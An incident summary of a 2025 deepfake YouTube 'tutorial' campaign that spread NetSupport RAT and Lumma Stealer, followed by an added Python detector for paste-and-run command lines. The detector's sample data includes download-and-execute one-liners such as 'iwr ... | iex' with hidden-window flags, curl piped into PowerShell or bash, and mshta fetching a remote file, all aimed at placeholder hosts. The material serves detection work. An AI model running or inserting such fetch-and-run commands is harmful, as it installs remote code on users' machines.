- Incident date
- Feb 2025
- Target
- Users of a compromised YouTube channel (over 110,000 subscribers). The attack also leveraged multiple fraudulent YouTube accounts, some with hundreds of thousands of subscribers.
Attackers used a deepfake video disguised as a tutorial for unlocking TradingView's developer mode. The video instructed viewers to run commands that installed malware (NetSupport RAT or Lumma Stealer), giving the attackers remote access and enabling data theft. AI-generated personas were used across multiple accounts, with engagement metrics manipulated to make them look credible. AI tools such as ChatGPT were used to write the malicious scripts; the attackers adapted their C&C domains over time and distributed the scripts through Pasteco. The goal was data exfiltration and system compromise, with cryptocurrency trading used as the lure.
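The step that actually compromises the victim here is the one the "tutorial" asks for: pasting a command into a console that fetches a script from a paste service and runs it. That pattern is visible in process-creation telemetry regardless of which video or persona delivered it. The following is an added example (not code from the incident report or from any vendor) of a heuristic that flags such download-and-execute one-liners; the sample command lines, the hostnames and the paste-host watchlist are constructed placeholders, not indicators from the attack.

```python
"""Heuristic detector for paste-and-run lures in process-creation command lines.

Added example for this incident summary; it is not code from the incident or
from any vendor. The sample command lines, hostnames and the paste-host
watchlist below are constructed placeholders, not indicators from the attack.
"""
import re
from dataclasses import dataclass, field

# Assumed watchlist of paste-service hostnames (placeholders; a real deployment
# would list the raw-paste domains actually observed in the environment).
PASTE_HOSTS = frozenset({"pasteco.example", "pastebin.example"})

# Primitives that pull remote content into the shell.
DOWNLOAD = re.compile(
    r"\b(iwr|invoke-webrequest|invoke-restmethod|irm|curl|wget|"
    r"certutil(\.exe)?\s+-urlcache|bitsadmin|downloadstring|downloadfile)\b", re.I)
# Sinks that execute whatever was fetched (pipe into an interpreter, or iex(...)).
EXECUTE = re.compile(
    r"(\|\s*(iex|invoke-expression|bash|sh|zsh|powershell(\.exe)?|pwsh|cmd(\.exe)?)\b"
    r"|\b(iex|invoke-expression)\s*\()", re.I)
# LOLBins that download and run a remote payload in a single step.
LOLBIN = re.compile(r"\b(mshta|regsvr32|rundll32)(\.exe)?\b.*https?://", re.I)
# Flags a tutorial-style lure typically adds so no window or policy prompt
# alerts the victim.
EVASION = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|-nop\b|-noprofile"
    r"|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})", re.I)
URL = re.compile(r"https?://([^\s/\"']+)", re.I)


@dataclass
class Finding:
    command_line: str
    reasons: list = field(default_factory=list)
    hosts: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def analyze(cmd: str) -> Finding:
    """Score one command line; each matched behaviour adds a reason."""
    f = Finding(cmd, hosts=URL.findall(cmd))
    if DOWNLOAD.search(cmd):
        f.reasons.append("download primitive")
    if EXECUTE.search(cmd):
        f.reasons.append("executes fetched content")
    if LOLBIN.search(cmd):
        f.reasons.append("lolbin fetches and runs remote content")
    if EVASION.search(cmd):
        f.reasons.append("hidden window / policy bypass flags")
    if any(h.lower() in PASTE_HOSTS for h in f.hosts):
        f.reasons.append("paste-service host")
    return f


def is_paste_and_run(f: Finding) -> bool:
    """True when the line both fetches remote content and runs it."""
    r = set(f.reasons)
    return ({"download primitive", "executes fetched content"} <= r
            or "lolbin fetches and runs remote content" in r)


def scan(lines) -> list:
    """Return only the findings that match the paste-and-run pattern."""
    return [f for f in map(analyze, lines) if is_paste_and_run(f)]


# Constructed sample process-creation command lines (not from the incident).
SAMPLE_COMMAND_LINES = [
    'powershell.exe -w hidden -ep bypass -c "iwr https://pasteco.example/raw/abc123 | iex"',
    "cmd.exe /c curl -s https://paste.example/raw/xyz | powershell -",
    'powershell.exe -c "Get-Process | Out-File procs.txt"',
    "curl -fsSL https://get.example.org/install.sh | bash",
    r"notepad.exe C:\Users\user\notes.txt",
    "mshta.exe https://cdn.example/update.hta",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        print(f"[score {f.score}] {f.command_line}\n    reasons: {', '.join(f.reasons)}")
```

The score is deliberately additive rather than a single signature: the fetch-and-run combination is what triggers the finding, while hidden-window flags and a known paste host raise the priority, so a rotated C&C domain or a new paste service still produces an alert, just a lower-ranked one. Run it against EDR or Sysmon event ID 1 command lines; the benign `Out-File` pipeline and the plain `notepad.exe` invocation in the sample set show that pipes and paths alone do not fire.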